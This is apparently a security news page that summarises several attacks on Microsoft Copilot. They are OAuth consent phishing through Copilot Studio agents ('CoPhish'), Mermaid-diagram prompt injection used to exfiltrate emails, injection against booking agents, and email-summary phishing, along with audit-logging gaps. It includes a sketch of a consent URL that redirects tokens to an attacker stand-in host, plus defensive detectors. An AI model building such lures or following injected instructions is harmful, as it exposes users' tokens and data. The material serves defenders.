
Novel Attacks Exploit Microsoft Copilot and Copilot Studio for Data Theft and OAuth Token Compromise

Updated October 25, 2025 at 07:00 PM · 2 sources


Security researchers have identified two distinct attack techniques targeting Microsoft's AI-powered platforms. The first, dubbed CoPhish, leverages Microsoft Copilot Studio agents to deliver fraudulent OAuth consent requests through legitimate Microsoft domains, enabling attackers to steal OAuth tokens. By customizing Copilot Studio chatbots and exploiting the platform's "demo website" feature, attackers can trick users into authenticating with malicious applications, potentially granting unauthorized access to sensitive resources. Microsoft has acknowledged the issue and is working on product updates to mitigate the risk, emphasizing the need for organizations to strengthen governance and consent processes.
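For context, the fraudulent consent request at the heart of CoPhish is ultimately a standard Microsoft identity platform authorization URL pointing at an attacker-registered application. The sketch below is illustrative only: the client ID, redirect URI, and scopes are placeholders, not values observed in the attack.

```python
from urllib.parse import urlencode

# Illustrative only: the shape of an OAuth consent URL a rogue app registration
# could present behind a Copilot Studio "Login" button. All values are placeholders.
AUTHORIZE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"

params = {
    "client_id": "00000000-0000-0000-0000-000000000000",       # attacker-registered app (placeholder)
    "response_type": "code",
    "redirect_uri": "https://attacker.example/callback",        # tokens land outside the tenant
    "response_mode": "query",
    "scope": "openid offline_access Mail.Read Files.Read.All",  # broad delegated permissions
    "state": "copilot-demo-session",
}

consent_url = f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"
print(consent_url)
```

From the defender's side, unfamiliar applications requesting this kind of delegated-scope combination, particularly with redirect URIs outside the organization, are the consent grants worth reviewing first.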

Separately, a vulnerability in Microsoft 365 Copilot was discovered that allowed attackers to use indirect prompt injection via Mermaid diagrams to exfiltrate sensitive tenant data, such as emails. By embedding malicious instructions in seemingly benign prompts, attackers could manipulate Copilot to retrieve and encode confidential information. Although Microsoft has since patched this flaw, the incident highlights the emerging risks associated with integrating AI assistants and third-party tools, as well as the challenges in securing complex, automated workflows within enterprise environments.
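As an illustration of this class of issue, the hedged sketch below scans Mermaid diagram source for hyperlink targets carrying unusually long query strings, the kind of channel an indirect injection could use to smuggle encoded data out of a tenant. The regex, threshold, and example URL are assumptions for demonstration, not details of the patched vulnerability.

```python
import re

# Hedged, illustrative detector for the exfiltration channel described above:
# flag Mermaid "click"/href targets whose query strings are long enough to be
# carrying encoded tenant data. Patterns and thresholds are assumptions.
LINK_TARGET = re.compile(r'(?:click\s+\w+\s+"(?P<click>[^"]+)"|href\s*=\s*"(?P<href>[^"]+)")')

def suspicious_mermaid_links(diagram_source: str, max_query_len: int = 120) -> list[str]:
    findings = []
    for match in LINK_TARGET.finditer(diagram_source):
        url = match.group("click") or match.group("href")
        query = url.split("?", 1)[1] if "?" in url else ""
        if len(query) > max_query_len:  # long query string -> possible encoded payload
            findings.append(url)
    return findings

# Example: a diagram node whose link carries a suspiciously long encoded parameter.
diagram = 'graph TD\n  A[Mail summary]\n  click A "https://exfil.example/c?d=' + "A" * 200 + '"'
print(suspicious_mermaid_links(diagram))
```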

Sources

October 25, 2025 at 12:00 AM
October 24, 2025 at 06:58 PM

Related Stories

OAuth Phishing and Malicious Application Abuse in Microsoft 365 Environments

Attackers are increasingly leveraging Microsoft Copilot Studio to facilitate OAuth phishing, exploiting its ability to host customizable agents and redirect users to arbitrary URLs. Security researchers have demonstrated that Copilot Studio agents, which appear as legitimate Microsoft services, can be configured with a 'Login' button that redirects unsuspecting users to malicious OAuth consent pages. Because the initial interaction occurs on a trusted Microsoft domain, the lure gains credibility and users are more likely to grant permissions to malicious applications. Once a user consents, attackers can exfiltrate OAuth tokens, gaining persistent access to sensitive data and services within the victim's Microsoft 365 environment. The flexibility of Copilot Studio, while valuable for legitimate automation, also gives attackers a powerful tool for crafting convincing phishing lures and automating token exfiltration.

Security experts emphasize reviewing and tightening Entra ID application consent policies, especially in light of recent and upcoming policy updates from Microsoft. Even with stronger consent policy enforcement, risks remain when users with elevated privileges, such as Application Administrators, can grant broad permissions.

In parallel, researchers have highlighted the prevalence of hidden malicious OAuth applications within Microsoft 365 tenants. Open-source tools such as Cazadora help administrators audit their environments for suspicious applications. Common indicators of malicious OAuth apps include names mimicking user accounts, generic test names, or non-alphanumeric strings, as well as reply URLs pointing to local loopback addresses. The discovery of even a single suspicious app often signals a broader compromise, so security teams are urged to regularly inspect both Enterprise Applications and Application Registrations for signs of abuse.

Together, Copilot Studio-based phishing and the widespread presence of malicious OAuth apps represent a significant threat to Microsoft 365 environments. Proactive monitoring, user education, and strict consent policies are critical mitigations, and defenders should expect continued abuse of trusted cloud services as attackers adapt their techniques.
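A minimal sketch of the audit heuristics described above, in the spirit of tools like Cazadora. The field names assume a JSON export shaped like Microsoft Graph application objects, and the indicator checks are illustrative rather than authoritative.

```python
import re

# Hedged sketch of OAuth app audit heuristics; field names assume a
# Microsoft Graph /applications-style export, which is an assumption here.
LOOPBACK = re.compile(r"^https?://(127\.0\.0\.1|localhost)", re.IGNORECASE)
GENERIC_NAMES = {"test", "test app", "demo", "app"}

def flag_suspicious_apps(apps: list[dict]) -> list[dict]:
    findings = []
    for app in apps:
        name = (app.get("displayName") or "").strip()
        reply_urls = app.get("web", {}).get("redirectUris", [])
        reasons = []
        if name.lower() in GENERIC_NAMES or not re.search(r"[a-z0-9]", name, re.IGNORECASE):
            reasons.append("generic or non-alphanumeric display name")
        if "@" in name:
            reasons.append("display name mimics a user account")
        if any(LOOPBACK.match(u) for u in reply_urls):
            reasons.append("reply URL points to a loopback address")
        if reasons:
            findings.append({"app": name or "<unnamed>", "reasons": reasons})
    return findings
```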

4 months ago

Prompt Injection Vulnerabilities in Microsoft Copilot Studio AI Agents

Security researchers demonstrated that Microsoft Copilot Studio's no-code AI agent platform is susceptible to prompt injection attacks, allowing unauthorized access to sensitive business data. By leveraging the platform's ease of use, even non-technical employees can create AI agents that integrate with critical business systems such as SharePoint, Outlook, and Teams. In controlled tests, researchers were able to extract customer credit card information and manipulate booking systems to create fraudulent transactions, such as booking a $0 vacation, by issuing carefully crafted prompts to the AI agents. The core risk arises from the democratization of AI agent creation, which, while boosting productivity, also increases the attack surface for organizations. The lack of technical safeguards and the inherent vulnerabilities of large language models (LLMs) make it easy for attackers or even well-meaning users to bypass intended security controls. Experts warn that these agentic tools, if not properly secured, can lead to significant data exposure and workflow hijacking, underscoring the urgent need for robust security practices and oversight when deploying AI-powered automation in business environments.
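One mitigation pattern implied by the booking example is to enforce business rules outside the agent entirely, so that a prompt-injected model cannot authorize actions the backend would never accept. The sketch below is hypothetical: the BookingRequest shape, catalog price lookup, and thresholds are assumptions, not part of Copilot Studio.

```python
from dataclasses import dataclass

# Hedged illustration: validate agent-initiated actions server-side so that
# a manipulated model cannot push through a fraudulent (e.g., $0) booking.
@dataclass
class BookingRequest:
    customer_id: str
    package: str
    quoted_price: float

MIN_PRICE = 1.00  # assumption: no legitimate package is free

def validate_agent_booking(req: BookingRequest, catalog_price: float) -> None:
    """catalog_price comes from a trusted system of record, not from the agent."""
    if req.quoted_price < MIN_PRICE:
        raise ValueError("rejected: zero or near-zero price quoted by agent")
    if abs(req.quoted_price - catalog_price) > 0.01:
        raise ValueError("rejected: agent-quoted price does not match catalog")
```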

3 months ago

Microsoft Copilot Security Research: Prompt-Injection Phishing Risk and Copilot Studio Audit-Logging Gaps

Security researchers reported two distinct Microsoft Copilot-related risks: (1) **cross prompt injection** against *Microsoft Copilot* email summarization surfaces that can cause attacker-supplied text in an email to be treated like instructions, shaping the summary into a convincing in-product “security alert” and creating a phishing path that does not rely on attachments or macros; and (2) **audit-logging gaps in Microsoft Copilot Studio** where certain administrative actions for Copilot Studio agents (e.g., around sharing, authentication, logging, and publication) were not consistently recorded in Microsoft 365’s Unified Audit Log, potentially reducing defenders’ ability to detect malicious or unauthorized agent changes. Permiso described how Copilot’s behavior varies across Outlook’s inline *Summarize* experience, the Outlook Copilot pane/add-in, and Teams-based summarization, with the core risk being **trust transfer**—users may treat Copilot output as system-generated even when it is attacker-influenced—and warned that retrieval across Microsoft 365 (Teams/OneDrive/SharePoint) could amplify impact if chained. Datadog Security Labs stated it reported Copilot Studio logging issues to **MSRC**, that Microsoft remediated logging for the affected events by **October 5, 2025**, and that Datadog later observed a **regression** where some events again failed to log consistently, which it also reported to Microsoft.
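A hedged sketch of how a defender might sanity-check audit coverage after the logging fix: compare a Unified Audit Log export against the Copilot Studio operations expected to appear. The operation names below are placeholders rather than official event names, and the export format is an assumption.

```python
import json

# Hedged sketch: verify that Copilot Studio-related operations show up in a
# Unified Audit Log (UAL) export. Operation names are placeholders; the point
# is to confirm agent sharing/auth/publication changes leave an audit trail.
EXPECTED_OPERATIONS = {
    "BotCreate",      # placeholder
    "BotShare",       # placeholder
    "BotPublish",     # placeholder
    "BotAuthUpdate",  # placeholder
}

def missing_copilot_studio_events(ual_export_path: str) -> set[str]:
    with open(ual_export_path) as fh:
        records = json.load(fh)  # assumes a JSON array of UAL records
    seen = {r.get("Operation") for r in records}
    return EXPECTED_OPERATIONS - seen
```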

5 days ago

